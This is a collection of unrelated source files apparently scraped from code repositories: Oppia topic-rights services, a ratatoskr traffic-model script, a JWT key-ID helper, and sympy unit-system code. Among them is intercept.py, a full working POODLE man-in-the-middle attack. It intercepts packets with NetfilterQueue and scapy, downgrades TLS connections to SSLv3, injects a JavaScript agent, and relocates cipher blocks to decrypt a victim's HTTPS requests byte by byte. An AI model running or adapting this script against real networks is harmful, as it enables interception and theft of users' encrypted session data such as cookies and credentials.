topic_models.TopicSummaryModel.get(topic_id).delete()
def generate_topic_summary(topic_id):
"""Creates and stores a summary of the given topic.
Args:
topic_id: str. ID of the topic.
"""
topic = topic_fetchers.get_topic_by_id(topic_id)
topic_summary = compute_summary_of_topic(topic)
save_topic_summary(topic_summary)
def compute_summary_of_topic(topic):
"""Create a TopicSummary domain object for a given Topic domain
object and return it.
Args:
topic: Topic. The topic object for which the summary is to be computed.
Returns:
TopicSummary. The computed summary for the given topic.
"""
canonical_story_count = 0
additional_story_count = 0
for reference in topic.canonical_story_references:
if reference.story_is_published:
canonical_story_count += 1
for reference in topic.additional_story_references:
if reference.story_is_published:
additional_story_count += 1
topic_model_canonical_story_count = canonical_story_count
topic_model_additional_story_count = additional_story_count
topic_model_uncategorized_skill_count = len(topic.uncategorized_skill_ids)
topic_model_subtopic_count = len(topic.subtopics)
total_skill_count = topic_model_uncategorized_skill_count
for subtopic in topic.subtopics:
total_skill_count = total_skill_count + len(subtopic.skill_ids)
topic_summary = topic_domain.TopicSummary(
topic.id, topic.name, topic.canonical_name, topic.language_code,
topic.description, topic.version, topic_model_canonical_story_count,
topic_model_additional_story_count,
topic_model_uncategorized_skill_count, topic_model_subtopic_count,
total_skill_count, topic.thumbnail_filename, topic.thumbnail_bg_color,
topic.url_fragment, topic.created_on, topic.last_updated
)
return topic_summary
def save_topic_summary(topic_summary):
"""Save a topic summary domain object as a TopicSummaryModel
entity in the datastore.
Args:
topic_summary: TopicSummaryModel. The topic summary object to be saved
in the datastore.
"""
topic_summary_dict = {
'name': topic_summary.name,
'description': topic_summary.description,
'canonical_name': topic_summary.canonical_name,
'language_code': topic_summary.language_code,
'version': topic_summary.version,
'additional_story_count': topic_summary.additional_story_count,
'canonical_story_count': topic_summary.canonical_story_count,
'uncategorized_skill_count': topic_summary.uncategorized_skill_count,
'subtopic_count': topic_summary.subtopic_count,
'total_skill_count': topic_summary.total_skill_count,
'thumbnail_filename': topic_summary.thumbnail_filename,
'thumbnail_bg_color': topic_summary.thumbnail_bg_color,
'topic_model_last_updated': topic_summary.topic_model_last_updated,
'topic_model_created_on': topic_summary.topic_model_created_on,
'url_fragment': topic_summary.url_fragment
}
topic_summary_model = (
topic_models.TopicSummaryModel.get_by_id(topic_summary.id))
if topic_summary_model is not None:
topic_summary_model.populate(**topic_summary_dict)
topic_summary_model.update_timestamps()
topic_summary_model.put()
else:
topic_summary_dict['id'] = topic_summary.id
model = topic_models.TopicSummaryModel(**topic_summary_dict)
model.update_timestamps()
model.put()
def publish_topic(topic_id, committer_id):
"""Marks the given topic as published.
Args:
topic_id: str. The id of the given topic.
committer_id: str. ID of the committer.
Raises:
Exception. The given topic does not exist.
Exception. The topic is already published.
Exception. The user does not have enough rights to publish the topic.
"""
topic_rights = topic_fetchers.get_topic_rights(topic_id, strict=False)
if topic_rights is None:
raise Exception('The given topic does not exist')
topic = topic_fetchers.get_topic_by_id(topic_id)
topic.validate(strict=True)
user = user_services.UserActionsInfo(committer_id)
if role_services.ACTION_CHANGE_TOPIC_STATUS not in user.actions:
raise Exception(
'The user does not have enough rights to publish the topic.')
if topic_rights.topic_is_published:
raise Exception('The topic is already published.')
topic_rights.topic_is_published = True
commit_cmds = [topic_domain.TopicRightsChange({
'cmd': topic_domain.CMD_PUBLISH_TOPIC
})]
save_topic_rights(
topic_rights, committer_id, 'Published the topic', commit_cmds)
opportunity_services.create_exploration_opportunities_for_topic(topic.id)
def unpublish_topic(topic_id, committer_id):
"""Marks the given topic as unpublished.
Args:
topic_id: str. The id of the given topic.
committer_id: str. ID of the committer.
Raises:
Exception. The given topic does not exist.
Exception. The topic is already unpublished.
Exception. The user does not have enough rights to unpublish the topic.
"""
topic_rights = topic_fetchers.get_topic_rights(topic_id, strict=False)
if topic_rights is None:
raise Exception('The given topic does not exist')
user = user_services.UserActionsInfo(committer_id)
if role_services.ACTION_CHANGE_TOPIC_STATUS not in user.actions:
raise Exception(
'The user does not have enough rights to unpublish the topic.')
if not topic_rights.topic_is_published:
raise Exception('The topic is already unpublished.')
topic_rights.topic_is_published = False
commit_cmds = [topic_domain.TopicRightsChange({
'cmd': topic_domain.CMD_UNPUBLISH_TOPIC
})]
save_topic_rights(
topic_rights, committer_id, 'Unpublished the topic', commit_cmds)
# Delete the exploration opportunities associated with the topic and reject
# the corresponding translation suggestions.
exp_ids = (
opportunity_services
.get_exploration_opportunity_ids_corresponding_to_topic(topic_id)
)
opportunity_services.delete_exploration_opportunities(exp_ids)
suggestion_services.auto_reject_translation_suggestions_for_exp_ids(exp_ids)
def save_topic_rights(topic_rights, committer_id, commit_message, commit_cmds):
"""Saves a TopicRights domain object to the datastore.
Args:
topic_rights: TopicRights. The rights object for the given
topic.
committer_id: str. ID of the committer.
commit_message: str. Descriptive message for the commit.
commit_cmds: list(TopicRightsChange). A list of commands describing
what kind of commit was done.
"""
model = topic_models.TopicRightsModel.get(topic_rights.id, strict=False)
model.manager_ids = topic_rights.manager_ids
model.topic_is_published = topic_rights.topic_is_published
commit_cmd_dicts = [commit_cmd.to_dict() for commit_cmd in commit_cmds]
model.commit(committer_id, commit_message, commit_cmd_dicts)
def create_new_topic_rights(topic_id, committer_id):
"""Creates a new topic rights object and saves it to the datastore.
Args:
topic_id: str. ID of the topic.
committer_id: str. ID of the committer.
"""
topic_rights = topic_domain.TopicRights(topic_id, [], False)
commit_cmds = [{'cmd': topic_domain.CMD_CREATE_NEW}]
topic_models.TopicRightsModel(
id=topic_rights.id,
manager_ids=topic_rights.manager_ids,
topic_is_published=topic_rights.topic_is_published
).commit(committer_id, 'Created new topic rights', commit_cmds)
def get_multi_topic_rights(topic_ids):
"""Returns the rights of all topics whose topic ids are passed in.
Args:
topic_ids: list(str). The IDs of topics for which rights are to be
returned.
Returns:
list(TopicRights). The list of rights of all given topics present in
the datastore.
"""
topic_rights_models = topic_models.TopicRightsModel.get_multi(topic_ids)
topic_rights = [
topic_fetchers.get_topic_rights_from_model(rights) if rights else None
for rights in topic_rights_models]
return topic_rights
def get_topic_rights_with_user(user_id):
"""Retrieves the rights object for all topics assigned to given user.
Args:
user_id: str. ID of the user.
Returns:
list(TopicRights). The rights objects associated with the topics
assigned to given user.
"""
topic_rights_models = topic_models.TopicRightsModel.get_by_user(user_id)
return [
topic_fetchers.get_topic_rights_from_model(model)
for model in topic_rights_models
if model is not None]
def get_all_topic_rights():
"""Returns the rights object of all topics present in the datastore.
Returns:
dict. The dict of rights objects of all topics present in the datastore
keyed by topic id.
"""
topic_rights_models = topic_models.TopicRightsModel.get_all()
topic_rights = {}
for model in topic_rights_models:
rights = topic_fetchers.get_topic_rights_from_model(model)
topic_rights[rights.id] = rights
return topic_rights
def filter_published_topic_ids(topic_ids):
"""Given list of topic IDs, returns the IDs of all topics that are published
in that list.
Args:
topic_ids: list(str). The list of topic ids.
Returns:
list(str). The topic IDs in the passed in list corresponding to
published topics.
"""
topic_rights_models = topic_models.TopicRightsModel.get_multi(topic_ids)
published_topic_ids = []
for ind, model in enumerate(topic_rights_models):
if model is None:
continue
rights = topic_fetchers.get_topic_rights_from_model(model)
if rights.topic_is_published:
published_topic_ids.append(topic_ids[ind])
return published_topic_ids
def check_can_edit_topic(user, topic_rights):
"""Checks whether the user can edit the given topic.
Args:
user: UserActionsInfo. Object having user_id, role and actions for
given user.
topic_rights: TopicRights or None. Rights object for the given topic.
Returns:
bool. Whether the given user can edit the given topic.
"""
if topic_rights is None:
return False
if role_services.ACTION_EDIT_ANY_TOPIC in user.actions:
return True
if role_services.ACTION_EDIT_OWNED_TOPIC not in user.actions:
return False
if topic_rights.is_manager(user.user_id):
return True
return False
def deassign_user_from_all_topics(committer, user_id):
"""Deassigns given user from all topics assigned to them.
Args:
committer: UserActionsInfo. UserActionsInfo object for the user
who is performing the action.
user_id: str. The ID of the user.
Raises:
Exception. The committer does not have rights to modify a role.
"""
topic_rights_list = get_topic_rights_with_user(user_id)
for topic_rights in topic_rights_list:
topic_rights.manager_ids.remove(user_id)
commit_cmds = [topic_domain.TopicRightsChange({
'cmd': topic_domain.CMD_REMOVE_MANAGER_ROLE,
'removed_user_id': user_id
})]
save_topic_rights(
topic_rights, committer.user_id,
'Removed all assigned topics from %s' % (user_id), commit_cmds)
def assign_role(committer, assignee, new_role, topic_id):
"""Assigns a new role to the user.
Args:
committer: UserActionsInfo. UserActionsInfo object for the user
who is performing the action.
assignee: UserActionsInfo. UserActionsInfo object for the user
whose role is being changed.
new_role: str. The name of the new role. Possible values are:
ROLE_MANAGER.
topic_id: str. ID of the topic.
Raises:
Exception. The committer does not have rights to modify a role.
Exception. The assignee is already a manager for the topic.
Exception. The assignee doesn't have enough rights to become a manager.
Exception. The role is invalid.
"""
committer_id = committer.user_id
topic_rights = topic_fetchers.get_topic_rights(topic_id)
if (role_services.ACTION_MODIFY_ROLES_FOR_ANY_ACTIVITY not in
committer.actions):
logging.error(
'User %s tried to allow user %s to be a %s of topic %s '
'but was refused permission.' % (
committer_id, assignee.user_id, new_role, topic_id))
raise Exception(
'UnauthorizedUserException: Could not assign new role.')
assignee_username = user_services.get_username(assignee.user_id)
if role_services.ACTION_EDIT_OWNED_TOPIC not in assignee.actions:
raise Exception(
'The assignee doesn\'t have enough rights to become a manager.')
old_role = topic_domain.ROLE_NONE
if topic_rights.is_manager(assignee.user_id):
old_role = topic_domain.ROLE_MANAGER
if new_role == topic_domain.ROLE_MANAGER:
if topic_rights.is_manager(assignee.user_id):
raise Exception('This user already is a manager for this topic')
topic_rights.manager_ids.append(assignee.user_id)
elif new_role == topic_domain.ROLE_NONE:
if topic_rights.is_manager(assignee.user_id):
topic_rights.manager_ids.remove(assignee.user_id)
else:
old_role = topic_domain.ROLE_NONE
else:
raise Exception('Invalid role: %s' % new_role)
commit_message = rights_domain.ASSIGN_ROLE_COMMIT_MESSAGE_TEMPLATE % (
assignee_username, old_role, new_role)
commit_cmds = [topic_domain.TopicRightsChange({
'cmd': topic_domain.CMD_CHANGE_ROLE,
'assignee_id': assignee.user_id,
'old_role': old_role,
'new_role': new_role
})]
save_topic_rights(topic_rights, committer_id, commit_message, commit_cmds)
| 40.411576
| 115
| 0.689171
|
3ff6a1c172d4ec84797f17aed4acfbb134efb439
| 4,459
|
py
|
Python
|
scripts/3D-VSoC-small/generate_model.py
|
Joern-Noeller/ratatoskr
|
4b60e9c880b7b647ce4ddc76f368452d85cdf5fe
|
[
"MIT"
] | 10
|
2019-09-05T01:35:53.000Z
|
2022-02-22T09:14:03.000Z
|
scripts/3D-VSoC-small/generate_model.py
|
Joern-Noeller/ratatoskr
|
4b60e9c880b7b647ce4ddc76f368452d85cdf5fe
|
[
"MIT"
] | 68
|
2018-02-05T18:02:38.000Z
|
2021-03-02T15:34:50.000Z
|
scripts/3D-VSoC-small/generate_model.py
|
Joern-Noeller/ratatoskr
|
4b60e9c880b7b647ce4ddc76f368452d85cdf5fe
|
[
"MIT"
] | 22
|
2018-10-31T01:43:46.000Z
|
2022-02-22T09:14:07.000Z
|
from xml_writers import DataWriter, MapWriter
import math
###############################################################################
""" Data Size Per Step """
stp1_data_sz = 13161
stp2_data_sz = 3716
stp3_data_sz = 929
stp4_data_sz = 1
interval = 100
###############################################################################
""" Create data.xml """
data_writer = DataWriter('data')
data_writer.add_dataTypes_node(['dt_0', 'dt_1', 'dt_2', 'dt_3'])
tasks_node = data_writer.add_tasks_node()
""" Bottom Layer """
for t_id in range(12):
task_node = data_writer.add_task_node(tasks_node, t_id)
requires_node = data_writer.add_requires_node(task_node)
if t_id in range(8, 12):
data_writer.add_requirement(requires_node, 0, 3, 32, stp4_data_sz)
elif t_id in range(4, 8):
data_writer.add_requirement(requires_node, 0, 3, 28, stp4_data_sz)
elif t_id in range(0, 4):
data_writer.add_requirement(requires_node, 0, 3, 24, stp4_data_sz)
""" Middle Layer """
for t_id in [12, 13, 16, 17, 20, 21]:
task_node = data_writer.add_task_node(tasks_node, t_id)
requires_node = data_writer.add_requires_node(task_node)
if t_id in [12, 16, 20]:
data_writer.add_requirement(requires_node, 0, 0, t_id + 13,
stp1_data_sz)
#data_writer.add_requirement(requires_node, 1, 0, t_id + 14,
# math.ceil(stp1_data_sz/2))
if t_id in [13, 17, 21]:
data_writer.add_requirement(requires_node, 0, 0, t_id + 14,
stp1_data_sz)
#data_writer.add_requirement(requires_node, 1, 0, t_id + 13,
# math.ceil(stp1_data_sz/2))
generates_node = data_writer.add_generates_node(task_node)
data_writer.add_possibility(generates_node, 0, 1, [0, 100], interval,
stp2_data_sz, 1, [t_id + 2])
for t_id in [14, 15, 18, 19, 22, 23]:
task_node = data_writer.add_task_node(tasks_node, t_id)
requires_node = data_writer.add_requires_node(task_node)
data_writer.add_requirement(requires_node, 0, 1, t_id - 2, stp2_data_sz)
generates_node = data_writer.add_generates_node(task_node)
if t_id in [14, 15]:
data_writer.add_possibility(generates_node, 0, 1, [0, 100],
interval, stp3_data_sz, 2, [24])
elif t_id in [18, 19]:
data_writer.add_possibility(generates_node, 0, 1, [0, 100],
interval, stp3_data_sz, 2, [28])
elif t_id in [22, 23]:
data_writer.add_possibility(generates_node, 0, 1, [0, 100],
interval, stp3_data_sz, 2, [32])
""" Top Layer """
for t_id in [24, 28, 32]:
task_node = data_writer.add_task_node(tasks_node, t_id)
requires_node = data_writer.add_requires_node(task_node)
data_writer.add_requirement(requires_node, 0, 2, t_id - 10, stp3_data_sz)
#data_writer.add_requirement(requires_node, 1, 2, t_id - 9, stp3_data_sz)
generates_node = data_writer.add_generates_node(task_node)
data_writer.add_possibility(generates_node, 0, 1, [0, 100], interval,
math.ceil(stp4_data_sz/4), 3, [t_id - 24,
t_id - 23, t_id - 22, t_id - 21])
for t_id in [25, 26, 27, 29, 30, 31, 33, 34, 35]:
task_node = data_writer.add_task_node(tasks_node, t_id)
generates_node = data_writer.add_generates_node(task_node)
if t_id in [25, 29, 33]:
data_writer.add_possibility(generates_node, 0, 1, [0, 100],
interval, stp1_data_sz, 0, [t_id - 13])
elif t_id in [26, 30, 34]:
data_writer.add_possibility(generates_node, 0, 1, [0, 100],
interval, math.ceil(stp1_data_sz/2),
0, [t_id - 13, t_id - 14])
elif t_id in [27, 31, 35]:
data_writer.add_possibility(generates_node, 0, 1, [0, 100],
interval, stp1_data_sz, 0, [t_id - 14])
data_writer.write_file('data.xml')
###############################################################################
""" Create map.xml """
map_writer = MapWriter('map')
map_writer.add_bindings(list(range(0, 36)),
list(range(0, 12)) +
list(range(20, 32)) +
list(range(36, 48)))
map_writer.write_file('map.xml')
| 46.447917
| 79
| 0.573895
|
417cb84b18bfa215758e043bf94cc2d0d861a92e
| 609
|
py
|
Python
|
sdc/crypto/helper.py
|
JamesGardiner/sdc-cryptography
|
e8e50595eefef7ed0bdf1b97abee98e60e9e6a10
|
[
"MIT"
] | 3
|
2017-10-05T12:38:15.000Z
|
2019-07-05T11:01:21.000Z
|
sdc/crypto/helper.py
|
JamesGardiner/sdc-cryptography
|
e8e50595eefef7ed0bdf1b97abee98e60e9e6a10
|
[
"MIT"
] | 29
|
2017-07-26T10:43:47.000Z
|
2021-04-30T12:53:42.000Z
|
sdc/crypto/helper.py
|
JamesGardiner/sdc-cryptography
|
e8e50595eefef7ed0bdf1b97abee98e60e9e6a10
|
[
"MIT"
] | 3
|
2021-04-11T07:54:38.000Z
|
2021-04-29T13:46:30.000Z
|
import json
from jwcrypto.common import base64url_decode
from sdc.crypto.exceptions import InvalidTokenException
def extract_kid_from_header(token):
header = token.split('.')[:1][0]
if not header:
raise InvalidTokenException("Missing Headers")
try:
protected_header = base64url_decode(header).decode()
protected_header_data = json.loads(protected_header)
if 'kid' in protected_header:
return protected_header_data['kid']
except ValueError:
raise InvalidTokenException("Invalid Header")
raise InvalidTokenException("Missing kid")
| 25.375
| 60
| 0.71757
|
b0f157af77ed7ba0eeb0e8530cda159cfecda315
| 14,838
|
py
|
Python
|
intercept.py
|
SteffeyDev/poodle
|
0edf50e0c93def560acc89a41d524da52de1690e
|
[
"MIT"
] | 8
|
2018-11-14T17:29:10.000Z
|
2020-10-20T17:11:19.000Z
|
intercept.py
|
SteffeyDev/poodle
|
0edf50e0c93def560acc89a41d524da52de1690e
|
[
"MIT"
] | 1
|
2020-09-06T05:47:52.000Z
|
2020-09-07T00:26:22.000Z
|
intercept.py
|
SteffeyDev/poodle
|
0edf50e0c93def560acc89a41d524da52de1690e
|
[
"MIT"
] | 5
|
2019-02-28T13:15:59.000Z
|
2020-10-20T17:11:27.000Z
|
#!/usr/bin/env python3
from netfilterqueue import NetfilterQueue
from scapy.all import *
from scapy_http.http import *
import json
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
import threading
import time
from reprint import output
import os
DEBUG = False
# Track sessions using src_port as key
sessions = {}
class Session:
def __init__(self, src_port):
self.downgrade_needed = True
self.src_port = src_port
self.ciphertext = None
self.last_seq = None
self.block = None
# Need to get the server IP from DNS response
server_ip = None
server_ip = '108.188.248.132' # temp
# For block_size stage
ciphertext_length = 0
data_padding_size_needed = 0
block_size = None
# For exploit stage
block_to_move = 1
current_offset = 0
secret = {}
count = 0
number_of_requests = {}
dns_mapping = {}
request_length_count = {}
option_request_length = None
post_request_length = None
option_response_length = None
skip_first_response = True
load_layer('tls')
config = json.load(open('config.json'))
log_file = open('intercept.log', 'w')
# Load the variables into the JavaScript agent that will be run on the target
js_client_html = open('poodle.js', 'r').read()
js_client_html = js_client_html.replace('attackerIp', '"' + config['attacker'] + '"').replace('targetUrl', '"https://' + config['server'] + '"').replace('\n', '').replace('\r', '').replace('\t', '')
def get_field(layer, field_name):
return layer.get_field(field_name).i2repr(layer, getattr(layer, field_name))
def copy_block_to_end(arr, copy_index):
return arr[:-block_size] + arr[copy_index:(copy_index+block_size)]
def modify_and_send_packet(packet, pkt):
del pkt[IP].chksum
del pkt[TCP].chksum
pkt[IP].len = len(pkt)
packet.set_payload(bytes(pkt))
packet.accept()
def log(text):
if DEBUG:
print(text)
log_file.write(text + '\n')
with output(output_type='list', initial_len=6) as output_list:
output_list[0] = 'Waiting for agent...'
def get_current_index():
if block_size:
return ((block_to_move + 1) * block_size) - current_offset
return 0
def print_state(ciphertext_length = None, math_str = None):
if not DEBUG:
update_state_progress()
output_list[2] = "Last Byte Decrypted: {}".format(math_str) if math_str is not None else ''
plaintext = repr(''.join([ chr(secret[i]) if i in secret else '.' for i in range(ciphertext_length) ])) if ciphertext_length is not None else '......'
output_list[3] = "Decrypted Plaintext: {}".format(plaintext)
percent_complete = len(secret) / ciphertext_length if ciphertext_length is not None else 0
segment = int(percent_complete * 50)
progress_bar = ("#" * segment) + (" " * (50-segment))
output_list[4] = "Progress: [{}] {}%".format(progress_bar, int(percent_complete*100))
if len(number_of_requests) > 0:
output_list[5] = "Average number of requests: {}".format(sum(number_of_requests.values()) / len(number_of_requests))
else:
output_list[5] = "Average number of requests: N/A"
def update_state_progress():
if not DEBUG and block_size is not None and post_request_length is not None:
output_list[0] = "Block Size: {}, POST Request length: {}".format(block_size, post_request_length) + (", OPTION Request length: {}".format(option_request_length) if option_request_length is not None else "")
current_index = get_current_index()
try:
output_list[1] = "Working on decrypting byte {} - Request #{}".format(current_index, number_of_requests[current_index])
except:
pass
def callback(packet):
global block_size
global block_to_move
global ciphertext_length
global data_padding_size_needed
global sessions
global option_request_length
global post_request_length
global option_response_length
global skip_first_response
global current_offset
global dns_mapping
global server_ip
global number_of_requests
global request_length_count
pkt = IP(packet.get_payload())
# Javacript HTTP injection not quite working
# TODO: Fix
if HTTP in pkt and config['injectJS']:
# On outgoing HTTP requests, make sure there is no compression or caching
if pkt.src == config['target']:
log("Sending request to " + pkt.dst)
raw_http = pkt['HTTP']['Raw'].load.decode('utf8')
if 'GET' in raw_http and len(raw_http) > 0:
encoding_pattern = 'Accept-Encoding: ([a-z-,]+)'
encoding_match = re.search(encoding_pattern, raw_http)
if encoding_match is not None:
raw_http = raw_http.replace(encoding_match.group(), 'Accept-Encoding: identity')
else:
index = raw_http.find('\r\n\r\n')
if index > 0:
raw_http = raw_http[:index] + '\r\nAccept-Encoding: identity' + raw_http[:index]
cache_pattern = 'Cache-Control: ([a-z-=0-9]+)'
cache_match = re.search(cache_pattern, raw_http)
if cache_match is not None:
raw_http = raw_http.replace(cache_match.group(), 'Cache-Control: no-cache')
else:
index = raw_http.find('\r\n\r\n')
if index > 0:
raw_http = raw_http[:index] + '\r\nCache-Control: no-cache' + raw_http[:index]
#pkt[HTTP][Raw].load = bytes(raw_http, 'utf8')
log("Sent: " + str(raw_http))
modify_and_send_packet(packet, pkt)
return
#pkt.getlayer(HTTP).getlayer(Raw).load = bytes(str(pkt.getlayer(HTTP).getlayer(Raw).load).replace('Accept-Encoding: gzip', 'Accept-Encoding: identity').replace('Cache-Control' + str(pkt['HTTP']['HTTP Request'].fields['Cache-Control']), 'Cache-Control: no-cache'))
# pkt.getlayer(HTTP).show()
#str_headers = str(pkt['HTTP']['HTTP Request'].fields['Headers'])
#pkt['HTTP']['HTTP Request'].fields['Accept-Encoding'] = 'identity'
#pkt['HTTP']['HTTP Request'].fields['Cache-Control'] = 'no-cache'
#str_headers = str_headers.replace('Accept-Encoding: ' + str(pkt['HTTP']['HTTP Request'].fields['Accept-Encoding']), 'Accept-Encoding: identity').replace('Cache-Control' + str(pkt['HTTP']['HTTP Request'].fields['Cache-Control']), 'Cache-Control: no-cache')
#pkt['HTTP']['HTTP Request'].fields['Headers'] = str_headers
# On return packets, inject the JS client
elif pkt.dst == config['target'] and HTTP in pkt:
raw_http = pkt[HTTP][Raw].load.decode('utf8').replace('\\r\\n', '')
index = raw_http.find('</body>')
if index > 0:
raw_http = bytes(raw_http[:index] + js_client_html + raw_http[index:], 'utf8')
#pkt[HTTP][Raw].load = raw_http
modify_and_send_packet(packet, pkt)
else:
packet.accept()
return
if pkt.src == config['target'] and pkt.dst == server_ip and pkt.haslayer(TLS):
log("TLS Type: {}".format(get_field(pkt.getlayer(TLS), 'type')))
# TLS Downgrade
if TLS in pkt and get_field(pkt['TLS'], 'version') != 'SSLv3':
# Change the client handshake to offer SSLv3
if get_field(pkt.getlayer(TLS), 'type') == "handshake":
# 0x0300 is SSLv3
pkt[TLS].version = 0x0300
pkt[TLS]['TLS Handshake - Client Hello'].version = 0x0300
# Otherwise, if we are sending data over TLS, just end the connection
else:
pkt[TCP].flags = 'FA'
pkt[TCP].len = 0
pkt[TCP].remove_payload()
modify_and_send_packet(packet, pkt)
return
src_port = pkt['TCP'].sport
session = sessions[src_port] if src_port in sessions else Session(src_port)
# Modify retransmissions
if session.ciphertext is not None and bytes(pkt)[-block_size:] == session.ciphertext[-block_size:]:
new_bytes = bytes(pkt)[:-block_size] + session.block
modify_and_send_packet(packet, IP(new_bytes))
return
sessions[src_port] = session
if TLS in pkt and get_field(pkt.getlayer(TLS), 'type') == "application_data":
# Need to make sure that the packets are sent by our JS agent, and one thing our JS agent does is send the same packets over and over...
request_length_count[len(pkt)] = request_length_count[len(pkt)] + 1 if len(pkt) in request_length_count else 1
if request_length_count[len(pkt)] < 5:
packet.accept()
return
# Don't modify pre-flight check
if config["skipOptions"] and (option_request_length is None or (post_request_length is not None and len(pkt) < post_request_length)):
log("Skipping OPTION Request")
if option_request_length is None:
log("OPTION Request Length: " + str(len(pkt)))
option_request_length = len(pkt)
packet.accept()
return
elif post_request_length is None:
log("POST Request Length: " + str(len(pkt)))
post_request_length = len(pkt)
# Stage 1: The JS client is sending packets of increasing length
if block_size is None:
log("Got request length " + str(len(pkt)))
if ciphertext_length > 0:
if len(pkt) > ciphertext_length:
block_size = len(pkt) - ciphertext_length
print_state(ciphertext_length)
log("Found block size: " + str(block_size))
# Get amount of padding needed by looking back and seeing how many requests were made before the first jump in request size
current_len = len(pkt)
while (current_len - block_size) in request_length_count:
current_len -= block_size
data_padding_size_needed = request_length_count[current_len]
log("Found padding length: " + str(data_padding_size_needed))
else:
ciphertext_length = len(pkt)
# Stage 2: The JS client is sending the same packet repeatedly and waiting for us to decrypt it
else:
if len(pkt) > post_request_length:
log("New POST Request Length: " + str(len(pkt)))
post_request_length = len(pkt)
if get_current_index() in number_of_requests:
number_of_requests[get_current_index()] += 1
update_state_progress()
log("Copying block to end")
start_index = block_size * block_to_move
tls_data_start_index = ([i + 5 for i in range(len(bytes(pkt))) if list(bytes(pkt))[i:i+3] == [0x17, 0x03, 0x00]])[-1]
session.ciphertext = bytes(pkt)[tls_data_start_index:]
log("tls_data_start_index: " + str(tls_data_start_index))
log("start_index: " + str(start_index))
new_bytes = copy_block_to_end(bytes(pkt), tls_data_start_index + start_index)
session.block = new_bytes[-block_size:]
modify_and_send_packet(packet, IP(new_bytes))
return
elif pkt.src == server_ip and pkt.dst == config['target'] and 'TLS' in pkt and block_size is not None:
# If we get success (data instead of alert), do math to get byte
if get_field(pkt.getlayer(TLS), 'type') == "application_data" and pkt['TCP'].dport in sessions:
# The first response that ends up here will be the response to the last block length query, so need to ignore it
if skip_first_response:
skip_first_response = False
packet.accept()
return
# Ignore response to pre-flight check
if config["skipOptions"] and (option_response_length is None or len(pkt) == option_response_length):
log("Skipping OPTION Response")
if option_response_length is None:
log("OPTION Response length: " + str(len(pkt)))
option_response_length = len(pkt)
packet.accept()
return
session = sessions[pkt['TCP'].dport]
ciphertext = session.ciphertext
del sessions[pkt[TCP].dport]
if ciphertext is not None:
previous_block_last_byte = ciphertext[((block_to_move) * block_size) - 1]
last_block_last_byte = ciphertext[-block_size - 1]
decrypted_byte = (block_size - 1) ^ previous_block_last_byte ^ last_block_last_byte
decrypted_byte_index = ((block_to_move + 1) * block_size) - current_offset - 1
# Store what was learned
secret[decrypted_byte_index] = decrypted_byte
if decrypted_byte_index == ciphertext_length - 1:
log_result_and_end()
# Reset all sessions
sessions = {}
print_state(len(ciphertext), "{} = {} ^ {} ^ {}".format(decrypted_byte, block_size - 1, previous_block_last_byte, last_block_last_byte))
else:
log("ciphertext is None")
else:
log("TLS Type: {}".format(get_field(pkt.getlayer(TLS), 'type')))
# Try to get server IP address from the dns name given in the config file and the DNS traffic we've intercepted
elif server_ip is None and pkt.dst == config['target'] and DNS in pkt:
resource = pkt[DNS]['DNS Resource Record']
while resource is not None:
dns_mapping[get_field(resource, 'rrname')] = get_field(resource, 'rdata')
if 'DNS Resource Record' in resource.payload:
resource = resource.payload['DNS Resource Record']
else:
resource = None
track = config['server']
while not track.replace('.', '').isnumeric() and track in dns_mapping:
track = dns_mapping[track]
if track.replace('.', '').isnumeric():
server_ip = track
pass
# parse DNS response and get server_ip
packet.accept()
class Handler(BaseHTTPRequestHandler):
def log_message(self, format, *args):
log(format.format(*args))
def add_headers(self):
self.send_header("Content-type", "text/plain")
self.send_header('Access-Control-Allow-Origin', '*')
def do_GET(self):
global block_size
global data_padding_size_needed
global current_offset
global block_to_move
global number_of_requests
content = None
while block_size == None:
time.sleep(0.1)
if self.path == '/blocksize':
output_list[0] = 'Finding Block Size...'
content = bytes(str(block_size) + " " + str(int(data_padding_size_needed + 1)), 'utf8')
elif self.path == '/offset':
for i in range(block_size):
if ((block_to_move + 1) * block_size) - i - 1 not in secret:
current_offset = i
content = bytes(str(i), 'utf8')
break
if content == None:
block_to_move += 1
current_offset = 0
content = bytes('0', 'utf8')
number_of_requests[get_current_index()] = 0
else:
self.send_error(404, "Endpoint does not exist")
return
self.send_response(200)
self.send_header('Content-Length', len(content))
self.add_headers()
self.end_headers()
self.wfile.write(content)
class ThreadingSimpleServer(ThreadingMixIn, HTTPServer):
pass
web_server = ThreadingSimpleServer(('0.0.0.0', 80), Handler)
web_server_thread = threading.Thread(target=web_server.serve_forever)
nfqueue = NetfilterQueue()
nfqueue.bind(0, callback)
# Called when entire request is decrypted
def log_result_and_end():
global secret
global ciphertext_length
plaintext = repr(''.join([ chr(secret[i]) if i in secret else '.' for i in range(ciphertext_length) ]))
out_file = open('plaintext.txt', 'w')
out_file.write(plaintext)
out_file.close()
nfqueue.unbind()
web_server.shutdown()
web_server_thread.join()
log_file.close()
os._exit(0)
try:
web_server_thread.start()
nfqueue.run()
except KeyboardInterrupt:
pass
nfqueue.unbind()
web_server.shutdown()
web_server_thread.join()
log_file.close()
| 34.347222
| 267
| 0.692479
|
b196a017198db70c3222bb5f4ebd5b1d3745f0fb
| 7,453
|
py
|
Python
|
sympy/physics/units/unitsystem.py
|
bigfooted/sympy
|
1fb2490fa2fa9b476da450f02a25b03c1dc07cf0
|
[
"BSD-3-Clause"
] | 603
|
2020-12-23T13:49:32.000Z
|
2022-03-31T23:38:03.000Z
|
sympy/physics/units/unitsystem.py
|
bigfooted/sympy
|
1fb2490fa2fa9b476da450f02a25b03c1dc07cf0
|
[
"BSD-3-Clause"
] | 387
|
2020-12-15T14:54:04.000Z
|
2022-03-31T07:00:21.000Z
|
sympy/physics/units/unitsystem.py
|
bigfooted/sympy
|
1fb2490fa2fa9b476da450f02a25b03c1dc07cf0
|
[
"BSD-3-Clause"
] | 35
|
2021-03-26T03:12:04.000Z
|
2022-03-23T10:15:10.000Z
|
"""
Unit system for physical quantities; include definition of constants.
"""
from typing import Dict
from sympy import S, Mul, Pow, Add, Function, Derivative
from sympy.physics.units.dimensions import _QuantityMapper
from sympy.utilities.exceptions import SymPyDeprecationWarning
from .dimensions import Dimension
class UnitSystem(_QuantityMapper):
"""
UnitSystem represents a coherent set of units.
A unit system is basically a dimension system with notions of scales. Many
of the methods are defined in the same way.
It is much better if all base units have a symbol.
"""
_unit_systems = {} # type: Dict[str, UnitSystem]
def __init__(self, base_units, units=(), name="", descr="", dimension_system=None):
UnitSystem._unit_systems[name] = self
self.name = name
self.descr = descr
self._base_units = base_units
self._dimension_system = dimension_system
self._units = tuple(set(base_units) | set(units))
